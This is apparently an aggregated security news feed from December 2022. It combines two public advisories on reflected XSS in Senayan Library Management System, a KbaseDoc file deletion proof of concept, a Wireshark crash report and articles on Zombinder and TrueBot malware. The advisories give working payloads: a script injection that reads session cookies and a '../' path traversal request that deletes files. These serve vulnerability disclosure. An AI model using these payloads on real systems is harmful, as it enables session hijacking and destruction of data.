Senayan Library Management System version 9.0.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9Multiple XSS-Reflected vulnerabilities## Author: nu11secur1ty## Date: 12.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0## Description:The value of the keywords request parameter is copied into the valueof an HTML tag attribute which is encapsulated in double quotationmarks.The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhcwas submitted in the keywords parameter.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhcHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhjuUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywnSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Fri, 09 Dec 2022 06:23:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 29492<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>        <meta name="description" content="Open Source LibraryManagement System | Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)## Proof and Exploit:[href](https://streamable.com/ac60v3)## Time spent`01:00:00`

Senayan Library Management System 9.0.0 Cross Site Scripting

Senayan Library Management System version 9.4.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9XSS-Reflected- PHPSESSID Hijacking## Author: nu11secur1ty## Date: 12.08.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.4.0/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0## Description:The value of the `destination` request parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmyglwas submitted in the destination parameter.This input was echoed unmodified in the application's response. Theattacker can hijack the session of some users of the system.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=LoginHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48mOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=memberSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Thu, 08 Dec 2022 18:43:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 30590<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <meta name="robots" content="noindex, follow">        <metaname="description" content="Open Source Library Management System |Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta property="og:site_name" content="Senayan"/>        <meta property="og:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>    <meta name="twitter:card" content="summary">    <meta name="twitter:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta name="twitter:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="twitter:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>          <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">        <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/vegas/vegas.min.css">    <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"rel="stylesheet" type="text/css"/>        <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">        <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">        <link rel="stylesheet"href="template/default/assets/css/style.css?v=20221209-014320">    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>        <script src="template/default/assets/js/vue.min.js"></script>        <script src="template/default/assets/js/jquery.min.js"></script>        <script src="template/default/assets/js/popper.min.js"></script>        <script src="template/default/assets/js/bootstrap.min.js"></script>        <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>    <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>        <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>    <script src="/slims9_bulian-9.4.0/js/gui.js"></script>    <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script></head><body class="bg-grey-lightest">    <div class="result-search page-member-area">        <section id="section1 container-fluid">            <header class="c-header">                <div class="mask"></div><nav class="navbar navbar-expand-lg navbar-dark bg-transparent">    <a class="navbar-brand inline-flex items-center" href="index.php">                <svg            class="fill-current text-white inline-block h-8 w-8"            version="1.1"            xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"            xml:space="preserve">                <pathd="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4                C118.4,98.6,118.3,98.5,118.3,98.3zM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8zM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>         </svg>                <div class="inline-flex flex-col leading-tight ml-2">            <h1 class="text-lg m-0 p-0">Senayan</h1>                    </div>    </a>    <button class="navbar-toggler" type="button"data-toggle="collapse" data-target="#navbarSupportedContent"            aria-controls="navbarSupportedContent"aria-expanded="false" aria-label="Toggle navigation">        <span class="navbar-toggler-icon"></span>    </button>    <div class="collapse navbar-collapse" id="navbarSupportedContent">        <ul class="navbar-nav ml-auto">          <li class="nav-item ">    <a class="nav-link" href="index.php">Home</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=libinfo">Information</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=news">News</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=help">Help</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=librarian">Librarian</a></li>                        <li class="nav-item active">                  <a class="nav-link" href="index.php?p=member">Member Area</a>              </li>                      <li class="nav-item dropdown">                              <a class="nav-link dropdown-togglecursor-pointer" type="button" id="languageMenuButton"                   data-toggle="dropdown" aria-haspopup="true"aria-expanded="false">                    <span class="flag-icon flag-icon-us"style="border-radius: 2px;"></span>                </a>                <div class="dropdown-menu bg-grey-lighterdropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">                    <h6 class="dropdown-header">Select Language : </h6>                      <a class="dropdown-item"href="index.php?select_lang=ar_SA">        <span class="flag-icon flag-icon-sa mr-2"style="border-radius: 2px;"></span> Arabic    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">        <span class="flag-icon flag-icon-bd mr-2"style="border-radius: 2px;"></span> Bengali    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">        <span class="flag-icon flag-icon-br mr-2"style="border-radius: 2px;"></span> Brazilian Portuguese    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">        <span class="flag-icon flag-icon-us mr-2"style="border-radius: 2px;"></span> English    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">        <span class="flag-icon flag-icon-es mr-2"style="border-radius: 2px;"></span> Espanol    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">        <span class="flag-icon flag-icon-de mr-2"style="border-radius: 2px;"></span> German    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">        <span class="flag-icon flag-icon-id mr-2"style="border-radius: 2px;"></span> Indonesian    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">        <span class="flag-icon flag-icon-jp mr-2"style="border-radius: 2px;"></span> Japanese    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">        <span class="flag-icon flag-icon-my mr-2"style="border-radius: 2px;"></span> Malay    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">        <span class="flag-icon flag-icon-ir mr-2"style="border-radius: 2px;"></span> Persian    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">        <span class="flag-icon flag-icon-ru mr-2"style="border-radius: 2px;"></span> Russian    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">        <span class="flag-icon flag-icon-th mr-2"style="border-radius: 2px;"></span> Thai    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">        <span class="flag-icon flag-icon-tr mr-2"style="border-radius: 2px;"></span> Turkish    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">        <span class="flag-icon flag-icon-pk mr-2"style="border-radius: 2px;"></span> Urdu    </a>                </div>            </li>        </ul>    </div></nav>            </header>          <div class="search" id="search-wraper"xmlns:v-bind="http://www.w3.org/1999/xhtml">    <div class="container">        <div class="row">            <div class="col-lg-8 mx-auto">                <div class="card border-0 shadow">                    <div class="card-body">                        <form class="" action="index.php" method="get"@submit.prevent="searchSubmit">                            <input type="hidden" name="search" value="search">                            <input ref="keywords" value=""v-model.trim="keywords"                                   @focus="searchOnFocus"@blur="searchOnBlur" type="text" id="search-input"                                   name="keywords"class="input-transparent w-100" autocomplete="off"                                   placeholder="Enter keyword tosearch collection..."/>                        </form>                    </div>                </div>                <transition name="slide-fade">                    <div v-if="show" class="advanced-wraper shadowmt-4" id="advanced-wraper"                         v-click-outside="hideSearch">                        <p class="label mb-2">                            Search by :                            <i@click="hideSearch"                               class="far fa-times-circle float-righttext-danger cursor-pointer"></i>                        </p>                        <div class="d-flex flex-wrap">                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'keywords', 'btn-outline-secondary':searchBy !== 'keywords' }"                               @click="searchOnClick('keywords')"class="btn mr-2 mb-2">ALL</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'author', 'btn-outline-secondary': searchBy!== 'author' }"                               @click="searchOnClick('author')"class="btn mr-2 mb-2">Author</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'subject', 'btn-outline-secondary': searchBy!== 'subject' }"                               @click="searchOnClick('subject')"class="btn mr-2 mb-2">Subject</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy!== 'isbn' }"                               @click="searchOnClick('isbn')"class="btn mr-2 mb-2">ISBN/ISSN</a>                            <button class="btn btn-light mr-2 mb-2"disabled>OR TRY</button>                            <a class="btn btn-outline-primary mr-2mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>                        </div>                        <p v-if="lastKeywords.length > 0" class="labelmt-4">Last search:</p>                        <a:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"                           class="flex items-center justify-betweenpy-1 text-decoration-none text-grey-darkest hover:text-blue"                           v-for="k in lastKeywords" :key="k"><span><i                                        class="far fa-clocktext-grey-dark mr-2"></i><span class="italictext-sm">{{tmpObj[k].text}}</span></span><i                                    class="fas fa-angle-righttext-grey-dark"></i></a>                    </div>                </transition>            </div>        </div>    </div></div>        </section>        <div class="container py-4">          <div class="row">              <div class="col-md-8">                    <div>        <div class="tagline">Library Member Login</div>                <div class="loginInfo">Please insert your member IDand password given by library system administrator. If you arelibrary's member and don't have a password yet, please contact librarystaff.</div>        <div class="loginInfo">            <formaction="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"method="post">                <div class="fieldLabel">Member ID</div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)## Proof and Exploit:[href](https://streamable.com/dsl863)## Time spent`01:30:00`

Senayan Library Management System 9.4.0 Cross Site Scripting

By Deeba Ahmed
At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services.
This is a post from HackRead.com Read the original post: Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

ThreatFabric’s security researchers have reported a new **dark web** platform through which cybercriminals can easily add malware to legitimate Android applications.

Dubbed Zombinder, this platform was detected while investigating a campaign in which scammers were distributing multiple kinds of **Windows and Android malware**, including Android banking malware like Ermac, Laplas “clipper,” Erbium, and the Aurora stealer, etc.

This comes just days after a new dark web marketplace called **InTheBox** surfaced online, serving smartphone malware developers and operators.

Further probe helped researchers trace the adversary to a third-party dark web service provider called Zombinder. It was identified as an app programming interface binding service launched in March 2022.

According to ThreatFabric’s **blog post**, numerous different threat actors are using this service and advertising it on hacker forums. On one such forum, the service was promoted as a universal binder that binds malware with almost any legitimate app.

The campaign is designed to appear as it helps users access internet points by imitating the WiFi authorization portal. In reality, it pushes several different malware strains.

**What does Zombinder Do?**

In the campaign detected by ThreatFabric’s researchers, the service is distributing the **Xenomorph banking malware** disguised as the VidMate app. It is distributed via modified apps advertised/downloaded from a malicious website mimicking the application’s original website. The victim is lured to visit this site via malicious ads.

The Zombinder-infected app works just as it is marketed while the malicious activity carries on in the background and the victim stays unaware of the malware infection.

At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services. Those who downloaded **the infected Windows app** were delivered the Erbium stealer as well. It is an infamous Windows malware distributed to steal stored passwords, cookies, credit card details, and cryptocurrency wallet data.

It is worth noting that two downloaded buttons on the malicious website’s landing page, one for Windows and the other for Android. when a user clicks on the Download for Windows button, they are delivered malware designed for Microsoft operating system, including Aurora, Erbium, and Laplas clipper. Conversely, the Download for Android button distributes the **Ermac malware**.

**How to Stay Protected?**

If you want to stay safe, do not sideload apps even if you are desperate to make a specific product work. Also, avoid installing apps from unauthentic or unknown sources onto your Android mobile phone and rely on legitimate sources such as Google Play Store, Amazon Appstore, or Samsung Galaxy Store. Always check the app’s rating, and reviews, and check out the app developers’ website before installing a new app.

1.  **Psst! tool lets users share passwords using a link**
2.  **Chinese Hackers Hiding Malware in Windows Logo**
3.  **Trojan Source attack lets hackers exploit source code**
4.  **Android apps on Play Store infected with Windows malware**
5.  **Spyware Vendor Exploited Chrome, Firefox and Windows 0-days**

Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

Kbase Doc v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /web/IndexController.java.

****KbaseDoc V1.0 has an arbitrary file deletion vulnerability******Description:**

Kbase doc has an arbitrary file deletion vulnerability in src/main/java/com/eastrobot/doc/web/IndexController.java

Source code download address: https://github.com/ekoz/kbase-doc

Version: 1.0

**Vulnerability analysis:**

Locate the location where the vulnerability exists: src/main/java/com/eastrobot/doc/web/IndexController.java 

The POST request gets the name parameter,Since there is no filtering,As a result, parameters such as ../ can be spliced,Causes directory traversal,Because deletion is involved,Resulting in arbitrary file deletion vulnerability.

**Recurrence of vulnerability**

**Download the source code and build the local environment**

Create a poc.txt file in the kbase-doc-master\target\classes directory .

Use burpsuite to construct the following request.

\[+\] POC:

    POST /index/delete HTTP/1.1
    Host: test:8081
    Content-Length: 22
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Origin: chrome-extension://coohjcphdfgbiolnekdpbcijmhambjff
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie:__utma=71411734.247469081.1654064241.1654064241.1654064241.1; __utmz=71411734.1654064241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
    Connection: close
    
    name=..%2F..%2Fpoc.txt
    
    

It is found that poc.txt is deleted.

**Proof and Exploit:**

href

CVE-2022-45290: KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability/README.md at main · HH1F/KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 2 and Dec. 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for December 2 to December 9

Crash in the USB HID protocol dissector in Wireshark 3.6.0 to 3.6.8 allows denial of service via packet injection or crafted capture file on Windows

Skip to content

Open Issue created Sep 27, 2022 by **myrdyr@myrdyr**

**Crash in USB-HID dissector on Windows**

**Summary**

When dissecting a PCAP with USB-HID data, a crash can happen if the string "Keyboard 5 and %" is loaded from https://gitlab.com/wireshark/wireshark/-/blob/master/epan/dissectors/packet-usb-hid.c#L827. On Windows, the spurious '%' is treated as a format string identifier and crashes further down the line.

**Steps to reproduce**

Using version 3.6.8 (64-bit) on Windows 10:

tshark.exe -V -r minimal.pcap

OR

wireshark.exe minimal.pcap

**What is the current bug behavior?**

Tshark parses the first 5 frames, but crashes silently before finishing to output the 5th frame. Frame 6 doesn't get printed. Wireshark will crash without any error message or error report.

**What is the expected correct behavior?**

Some weird, but somewhat valid, dissected USB-HID data. The example is minimized from a much larger file in order to reproduce. Wireshark should not crash.

**Sample capture file**

minimal.pcap

**Relevant logs and/or screenshots**

    gdb: unknown target exception 0xc0000409 at 0x7ffeee4a1208
    
    Thread 1 received signal ?, Unknown signal.
    0x00007ffeee4a1208 in ucrtbase!_invoke_watson () from Windows/System32/ucrtbase.dll
    (gdb) info stack
    #0  0x00007ffeee4a1208 in ucrtbase!_invoke_watson () from Windows/System32/ucrtbase.dll
    #1  0x00007ffeee4524b1 in ucrtbase!_invalid_parameter_noinfo () from Windows/System32/ucrtbase.dll
    #2  0x00007ffeee452379 in ucrtbase!_invalid_parameter_noinfo () from Windows/System32/ucrtbase.dll
    #3  0x00007ffeee4829fc in ucrtbase!.intrinsic_setjmpex () from Windows/System32/ucrtbase.dll
    #4  0x00007ffeee441b49 in ucrtbase!_wtol () from Windows/System32/ucrtbase.dll
    #5  0x00007ffeee442304 in ucrtbase!_wctomb_s_l () from Windows/System32/ucrtbase.dll
    #6  0x00007ffeee442ed1 in ucrtbase!.stdio_common_vsprintf_s () from Windows/System32/ucrtbase.dll
    #7  0x00007ffee9356c4b in wmem_strdup_vprintf () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwsutil.dll
    #8  0x00007ffee9356bad in wmem_strdup_printf () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwsutil.dll
    #9  0x00007ffe21146d33 in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #10 0x00007ffe211484f2 in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #11 0x00007ffe205d1546 in libwireshark!call_dissector_only () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #12 0x00007ffe205d1771 in libwireshark!call_dissector_with_data () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #13 0x00007ffe205d4c0d in libwireshark!dissector_try_uint_new () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #14 0x00007ffe211575fe in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #15 0x00007ffe21154b2b in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #16 0x00007ffe21152d89 in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #17 0x00007ffe21151c2d in udp_dissect_pdus () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #18 0x00007ffe205d1546 in libwireshark!call_dissector_only () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #19 0x00007ffe205d1771 in libwireshark!call_dissector_with_data () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #20 0x00007ffe205d14b0 in libwireshark!call_dissector_only () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #21 0x00007ffe20a04d85 in libwireshark!dissect_e212_utf8_imsi () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #22 0x00007ffe205d1546 in libwireshark!call_dissector_only () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #23 0x00007ffe205d1771 in libwireshark!call_dissector_with_data () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #24 0x00007ffe205d14b0 in libwireshark!call_dissector_only () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #25 0x00007ffe205d15e7 in libwireshark!call_dissector_with_data () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #26 0x00007ffe205d2a23 in libwireshark!deregister_depend_dissector () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #27 0x00007ffe205c76e0 in libwireshark!epan_dissect_run_with_taps () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    

**Build information**

The crash initially happened on v3.6.8-0-gd25900c51508 Backtrace above is from Version 3.6.6 (v3.6.6-0-g7d96674e2a30)

    3.6.6 (v3.6.6-0-g7d96674e2a30)
    
    Compiled (64-bit) using Microsoft Visual Studio 2019 (VC++ 14.31, build 31107),
    with Qt 5.15.2, with libpcap, with GLib 2.66.4, with zlib 1.2.11, with Lua
    5.2.4, with GnuTLS 3.6.3 and PKCS #11 support, with Gcrypt 1.8.3, with MIT
    Kerberos, with MaxMind DB resolver, with nghttp2 1.44.0, with brotli, with LZ4,
    with Zstandard, with Snappy, with libxml2 2.9.10, with libsmi 0.4.8, with
    QtMultimedia, with automatic updates using WinSparkle 0.5.7, with AirPcap, with
    SpeexDSP (using bundled resampler), with Minizip.
    
    Running on 64-bit Windows 10 (21H2), build 19044, with Intel(R) Core(TM)
    i7-10750H CPU @ 2.60GHz (with SSE4.2), with 65281 MB of physical memory, with
    GLib 2.66.4, with Qt 5.15.2, without Npcap or WinPcap, with c-ares 1.17.0, with
    GnuTLS 3.6.3, with Gcrypt 1.8.3, with nghttp2 1.44.0, with brotli 1.0.9, with
    LZ4 1.9.3, with Zstandard 1.4.0, with AirPcap 4.1.0 build 1622, with light
    display mode, without HiDPI, with LC_TYPE=Norwegian Bokmål_Norway.utf8, binary
    plugins supported (21 loaded).

CVE-2022-3724: Crash in USB-HID dissector on Windows (#18384) · Issues · Wireshark Foundation / wireshark · GitLab

Cybersecurity researchers have reported an increase in TrueBot infections, primarily targeting Mexico, Brazil, Pakistan, and the U.S.
Cisco Talos said the attackers behind the operation have moved from using malicious emails to alternative delivery methods such as the exploitation of a now-patched remote code execution (RCE) flaw in Netwrix auditor as well as the Raspberry Robin worm.
"

Cybersecurity researchers have reported an increase in **TrueBot** infections, primarily targeting Mexico, Brazil, Pakistan, and the U.S.

Cisco Talos said the attackers behind the operation have moved from using malicious emails to alternative delivery methods such as the exploitation of a now-patched remote code execution (RCE) flaw in Netwrix auditor as well as the Raspberry Robin worm.

"Post-compromise activity included data theft and the execution of Clop ransomware," security researcher Tiago Pereira said in a Thursday report.

TrueBot is a Windows malware downloader that's attributed to a threat actor tracked by Group-IB as Silence, a Russian-speaking crew believed to share associations with Evil Corp (aka DEV-0243) and TA505.

The first-stage module functions as an entry point for subsequent post-exploitation activities, including information theft using a hitherto unknown custom data exfiltration utility dubbed Teleport, the cybersecurity firm said.

The use of Raspberry Robin – a worm mainly spread through infected USB drives – as a delivery vector for TrueBot was highlighted recently by Microsoft, which it said is part of a "complex and interconnected malware ecosystem."

In what's a further sign of enmeshed collaboration with other malware families, Raspberry Robin has also been observed deploying FakeUpdates (aka SocGholish) on compromised systems, ultimately leading to ransomware-like behavior linked to Evil Corp.

Microsoft is tracking the operators of the USB-based malware as DEV-0856 and the Clop ransomware attacks that happen via Raspberry Robin and TrueBot under the emerging threat cluster DEV-0950.

"DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages," the Windows maker noted in October 2022.

The latest findings from Cisco Talos show that the Silence APT carried out a small set of attacks between mid-August and September 2022 by abusing a critical RCE vulnerability in Netwrix auditor (CVE-2022-31199, CVSS score: 9.8) to download and run TrueBot.

